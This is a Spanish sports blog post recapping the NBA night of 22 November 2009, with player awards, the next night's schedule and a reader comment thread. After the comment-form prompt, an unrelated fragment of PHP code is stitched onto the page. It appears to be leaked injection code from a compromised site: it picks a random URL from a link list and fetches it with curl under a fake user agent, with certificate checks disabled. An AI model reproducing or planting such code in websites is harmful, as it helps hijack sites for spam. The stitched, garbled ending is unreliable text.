La Crónica (23/11/2009)

24 de November de 2009 por TheDeerHunter

Hasta 5 de los 8 equipos en liza abrían en negativo la poco apetecible jornada de anoche.

Siempre encontramos detalles que nos animen a seguir la “matinée”. Una de ellas bien podía ser disfrutar del deslumbrante juego de los Blazers de McMillan. Recibían a los Bulls, equipo de playoff del Este (para que no se diga) en versión Roy de 2, Webster de 3 y (cómo no) Blake titular y Miller de 6º. Se especula con que el bueno de André rinde mejor saliendo del banquillo. No sabríamos decir si este hecho tiene alguna relación con la configuración de escolta-alero que le ha tocado dirigir en su fase de titular como tampoco si se podría concluir un sesudo análisis similar relativo a Blake. No verán nuestros ojos otras “audaces” alternativas y termina siendo tontería elucubrar. El caso es que en medio de tantas vueltas fueron Oden y Aldridge los que arrasaron sin piedad la zona de los Bulls. Una noche para olvidar de Noah y el resto de pívots del equipo visitante.

Otra razón era disfrutar del eléctrico juego de “Smash” Jennings, con respecto al que ya sufrimos síndrome de abstinencia. Volvió Michael Redd, pero sin Bogut el nivel defensivo pierde enteros. Duncan 24, Bonner 23 y 112 puntos encajados frente a uno de los peores equipos ofensivos de la competición… y Jennings sufriendo pájara importante. No es lo mismo jugar contra Nelson que contra Popovic, amigo Brandon. Los Spurs alcanzan, oh noticia, el 50% de victorias.En el Staples, Al Thornton tuvo que marcarse el mejor partido de su triste año para doblegar a otro de los peores equipos de la historia. De no haber sido por la flor de Damien Wilkins en el primero estarían batiendo récords negativos (aunque disponen de tiempo todavía). El partido de Baron Davis fue directamente vergonzoso.

Por último, los Grizzlies batieron sin excesivas dificultades a los Kings. Buen partido de todos los titulares frente al “solo ante el peligro” de Tyreke. Sergio hizo su partido del año e incluso posiblemente de su carrera NBA. En 18 minutos 16 puntos y 7 asistencias. Con actuaciones como esta tendrán que contar algo más con él por fuerza.

PREMIOS

MVP: No se nos caen los anillos por darle el premio al mejor jugador del día a Al Thorton, superando a otros como Duncan, Oden o Aldridge. El de los Clippers ha sido clave en la victoria frente Minnesota con 31 puntos y 10 rebotes.

Rookie: Va de parejas la cosa. Si en los Hornets están contentísimo con su duo de rookies, lo mismo pasa en Sacramento donde Tyreke Evans y Omri Casspi mejoran día a día. 28 puntos para el primero y 15 para el segundo.

Sorpresa: ¡Cómo nos alegra otorgar hoy este premio! Sergio Rodríguez ha aprovechado perfectamente los minutos que le ha otorgado la nefasta actuación de Beno Udrih y en 17 minutos ha anotado 16 puntos y ha repartido 7 asistencias. Esperemos que sea el inicio de un cambio de situacion para él.

Decepción: Estamos de acuerdo en que no es fácil recuperarse de la grave lesión de rodilla que sufrió Al Jefferson la temporada pasada, pero no creo que eso influya mucho como para perder 8 balones. El ex de los Celtics debe estar contando los días que faltan para que vuelva Kevin Love. Y ya no digo nada de Baron Davis

Esfuerzo en vano: La pareja Deng-Salmons con 47 puntos entre los 2 fue lo más destacada de Chicago. Aún así, Portland les pasó, literalmente, por encima.

RAZONES PARA TRASNOCHAR

Esta noche abrirán fuego a la 1h00 los Sixers en pista de los Wizards y los Pacers en Toronto. A las 2h30 se disputará en Dallas un Warriors-Mavs desprovisto del morbo de ver a Nelson en el banquillo visitante, y ello a causa de una neumonía. Media hora después los Nets sumarán con toda probabilidad una nueva derrota a su ya abultada colección, y es que Denver no parece el mejor escenario para estrenar el casillero de victorias. También a las 3h00, interesante visita de los Thunder a Salt Lake city y, para acabar, a partir de las 4h30, los Lakers reciben a los Knicks en el primer enfrentamiento entre ambos equipos desde los 65 puntos de Kobe en el MSG.

VIDEO

Las 5 mejores jugadas días con Greg Oden como “protagonista” en las 2 primeras.

Comenta

14 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Discrepo en el penoso año de thorton, en los ultimos 7 partidos lleva una media de 19 puntos por partido, ademas de los 3 partidos que ha jugado 40 minutos o mas, en 2 de ellos ha medito 30 puntos. Vamos que empezo flojo, pero como los clippers en general, pero ya lleva 3 semanas aportando mucho y se esta trasladando a victorias para el equipo. Que te metas gratuitamente con davis pues lo veo logico, pq se espera muchisimo mas, pero con el chaval no.

      Citar

  2. Kantonyo dice:
    #2

    Alguien sabe algo de Blake Griffin, tiene para mucho tiempo su lesión?? ya hay ganas de verlo. Saludos!!!

      Citar

  3. TheDeerHunter dice:
    #3

    Te aseguro que a mí me encantaría que Baron Davis lo hiciera bien… Thornton me la trae un poco más al peiro.
    Lo de gratuito no pillo el concepto. Me meto tan gratuitamente con él como hago cualquier otra cosa en este medio… tendré que pedirle un aumento de sueldo a Txusma, que si no encima me vaciláis…

    Del chaval algunos ya esperábamos bastantes cosas el año pasado (y me suena que ya lo mencionamos) Para mí no cumplió las espectativas, aún con sus respetables (eso sí) 17 puntos 5 rebotes (por no traducirse demasiado en buenos resultados) Pero este año, lleva unos promedios no mucho mejores a su año de rookie (jugando más minutos)
    De sus últimos 7 partidos ha jugado 2 veces cojonudamente (incluido ayer, pero sólo una victoria) 3 veces apañadamente y 2 partidos reguleros (¿el 12-2 de toronto a ti te moló??) 3 victorias-4 derrotas. Pero el problema es que había jugado 8 partidos antes en los que daba bastante grimilla.
    Sí creo que se le debe de exigir más a este jugador… podría estar cerca del 20-10. Le veo capaz por condiciones.

      Citar

  4. univerzee dice:
    #4

    Sinceramente creo que meterse con BDavis gratuita o de pago esta totalmente justificado, personalmente estoy tan decepcionado con este tío que creo que casi todo esta justificado. Primero irse a LAC por la pasta y después arrastrarse de esta manera.
    Y sobre Jennings, no todo es GSW, cierto, pero el chico lleva buenas medias, y por lo que lo he visto me parece interesante, tan inconsistente en el tiro como indica su edad, pero con iniciativa y valentia… lo de fiabilizar el tiro es muy aprendible.
    De POR, mejor no decir nada. Blake es capaz de jubilar a CP3

      Citar

  5. Txusma dice:
    #5

    Por cierto, buena foto la de Casspi i Haddidi saludándose justo antes del partido. Y eso que se comentaba que el iraní podría renunciar a jugar. El deporte ha de estar por encima de estas cosas.

      Citar

  6. Vader dice:
    #6

    Buenas a todos,

    Por lo que he visto de Jennings su aparición me recuerda un poquito a la irrupción de Iverson. Un auténtico jugón!

    ¿Que números hizo Greg Oden? Me interesa mucho su evolución y en este pc no puedo mirar nba.com

    Saludos

      Citar

  7. sabas dice:
    #7

    Ademas de ser protagonista de la mejores jugadas hizo 24-12-1, en 27 minutos que no estan nada mal.

      Citar

  8. Love Denise dice:
    #8

    Oden fue el protagonista de la mejor jugada del partido, recibió un mate en la cara de Derrick Rose.
    No obstante hizo un buen partido, al igual que otro que suelo criticar (gratuitamente o de pago) bastante, el chacho Rodriguez. Espero equivocarme, pero apostaría a que en el próximo partido vuelve a sus 7 minutitos.

      Citar

  9. TheDeerHunter dice:
    #9

    pues eso no sería del todo justo tampoco, Denise

      Citar

  10. Óscar dice:
    #10

    Buen partido de Blazers, por fin más sueltos y atrevidos en ataque, que hacía falta ya… Oden empieza a mostrar que puede ser algo más que un baluarte atrás, aunque sus movimientos ofensivos (no pasan de tres, aunque ya utiliza la mano izquierda) son aún muy mejorables. Tiempo al tiempo… y que no se lesione xD…Bien también LaMarcus, aunque le falta mucho para plantearse de verdad la posibilidad de que sea All-Star en su Dallas natal… Quizás me equivoque pensando que (ya) es un grande de verdad… Bueno, ahora recibir a NJN y MEM… a ver si nos ponemos con 13-5, estaría bien.

    Para mí “el chaval” Al thornton es un magnífico jugador, pero coincido con Deer que le falta mucha consistencia, regularidad. Si le pillas en un buen partido no dudas que antes o después va a ser uno de los mejores SF de la Liga, pero le falta eso… porque potencial lo tiene todo…

    @ Kantonyo : Blake Griffin estará de vuelta sobre el 20 de Diciembre, aunque por el tipo de lesión y que tienen que ir con pies de plomo para no arriesgar… échale para finales de mes o primeros de Enero… Mucho tiene que jugar para desbancar a Jennings como favorito a R.O.Y. …

      Citar

  11. portu dice:
    #11

    Cositas del Grizzlies-Kings. Sobretodo decir q me han gustado los ositos, en ataque ya se sabe a qué juega cada uno: 2 tíos pasan el balón y aprvechan sus opciones sencillas (Conley y Marc), otros 2 son los chupones puros (Gay y Zach Randolph) y luego está Mayo, q hace un poco de cada en función de cómo se sienta de inspirado en el tiro. De Gay tb decir q aunque sigue siendo egoista, cada vez lee el juego de forma más eficaz y penetra cuando es la mejor opción y no se obceca tanto con el tiro. Desde el banquillo hasta Thabeet puede aportar cositas, se mueve fenomenal para la gran altura q tiene, es coordinado y sólo le faltan minutos de NBA para ir curtiéndose, pero no me parece el paketorro q en muchos momentos hemos pensado q era… o por lo menos lo es al mismo nivel q Oden y similares. Tampoco todo esto da para mucho pq siguen siendo blanditos en defensa, no tienen más banquillo y pq delante tenían a los Kings, q en defensa sí q son unas madres.

    De los Kings, intentando sacar cosas buenas… pues q Tyreke es 2, y un 2 de los buenos, tienen una coordinación corporal extraordinaria, sobretodo al entrar a canasta, siendo algo más basto, recuerda un poco en los desplazamientos a Roy. Ya están tardando los Kings en traspasar a K. Martin pq creo q ambos en pista no pueden estar al mismo tiempo, un trade por ejemplo por R. Sessions y algo más les vendría de perlas. Tb tiene muy buena pinta Casspi, creo q puede además darle algo de carácter al equipo. Sobre el chacho comentar algo q a mi me parece un acierto, no sólo está más agresivo en ataque, sino q transmite esa energía más en forma de penetraciones a canasta buscando doblar el balón o su tiro si le dejan, y no tanto los tiros exteriores, q era lo q hacía con más frecuencia en Portland. El equipo ha jugado mejor con él en cancha, aunque tb hay q dar el detalle q su “defensor” en muchos momentos ha sido Tinsley, q no está para muchos trotes el hombre. Ha estado desacertado hoy Jason Thompson, q va tan sobrado físicamente q a veces hace muchas faltas q limitan su juego. Este equipo necesita otorgar galones desde ya a T. Evans y Casspi, un base titular y un pivot q acompañe a Thompson, pq me temo q Hawes “sangre de horchata” va destino de ser un Frye cualquiera.

      Citar

  12. sergio dice:
    #12

    Deer…. no me critiques a Thornton por no conseguir un 20-10 y luego en el informe semanal #4 digas que no ser como Duncan no es un defecto… que un 20-10 no esta a la altura de muchos en esta liga. Gente como Yao, Pau o Nowtizki (se quedo en 9.9 xD) no lo han conseguido en una temporada completa. Con un 16-8 seria un complemento idoneo para Gordon, Griffin,….

      Citar

  13. TheDeerHunter dice:
    #13

    No. Yo no he criticado a Thornton por no lograr un 20-10. He dicho que me parece un jugador con esa proyección… pero de eso, a lo que está haciendo va un trecho importante.
    No podemos decir que esté haciendo una gran temporada cuando ha disminuido sus números significativamente y se ha puesto prácticamente al nivel de su año de rookie, cuando el año pasado apuntaba a otra cosa. Me parece que él mismo no estará satisfecho con el año que viene haciendo.
    Es cierto que ha mejorado en los últimos partidos, como apuntaba Xapa… pero es que hasta hace bien poco ni lesiones ni nada. Kaman matándose a hacer partidacos y el resto tocando palmas. En el resto le incluyo a él, que ha sido pasado por Eric Gordon en peso específico y me caben pocas dudas de que también lo será por Griffin.
    De verdad que no me parece que sea un jugador para ser 4ª o 5ª espada… y ahí tiene que decir muchas cosas. Buena parte de responsabilidad de la mala marcha de los Clippers durante este inicio la tiene él. Aunque si la cosa cambia en parte me alegraré. Les di playoffs en la porra.

      Citar

  14. sergio dice:
    #14

    Talmente dacuerdo! solo era puntualizar lo del 20-10. Muchas proyecciones se quedan en proyectos… algo logico. Pero mas peso deberia recaer sobre Davis que sobre Thornton, que tendria que cargarselo voluntariamente no??

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>